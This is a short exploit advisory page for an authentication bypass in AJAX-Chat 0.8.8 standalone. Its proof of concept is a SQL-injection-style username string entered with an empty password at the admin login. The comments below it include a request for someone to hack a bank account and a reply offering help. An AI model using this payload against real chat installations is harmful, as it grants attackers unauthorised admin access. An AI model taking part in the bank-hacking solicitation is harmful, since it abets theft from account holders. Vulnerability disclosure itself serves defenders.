AJAX-Chat-0.8.8-standalone - Authentication Bypass

2018.07.11

Ashiyane Digital Security Team (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

|===============================================|
|                         In The Name Of GOD
|===============================================|
| Exploit Title: AJAX-Chat-0.8.8-standalone - Authentication Bypass
| Dork: N/A
| Date: 2018-07-10
| Exploit Author: Ashiyane Digital Security TEAM
| Vendor Homepage: https://frug.github.io/AJAX-Chat/
| Software Link : https://github.com/Frug/AJAX-Chat/archive/0.8.8-standalone.zip
| Version: v0.8.8
| Category: Web apps
| CVE: N/A
|===============================================|
| Description:
| With this exploit,attacker can bypass admin login authentication.
|
|===============================================|
|
| Proof of Concept :
|
| http://localhost/PATH/chat/index.php
| 
| Username : admin  or  'or' '='
| Password :  
|===============================================|

See this note in RAW Version

Vote for this issue:

72%

28%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Reza

| Date: 2019-06-01 11:10 CET+1

Pls contact me,we need trusted person for hack bank account in EUR

mohamad

| Date: 2022-06-06 09:25 CET+1

hi my name is mohamad and i live in tabriz can i help you?

AJAX-Chat-0.8.8-standalone - Authentication Bypass

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

AJAX-Chat-0.8.8-standalone - Authentication Bypass

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.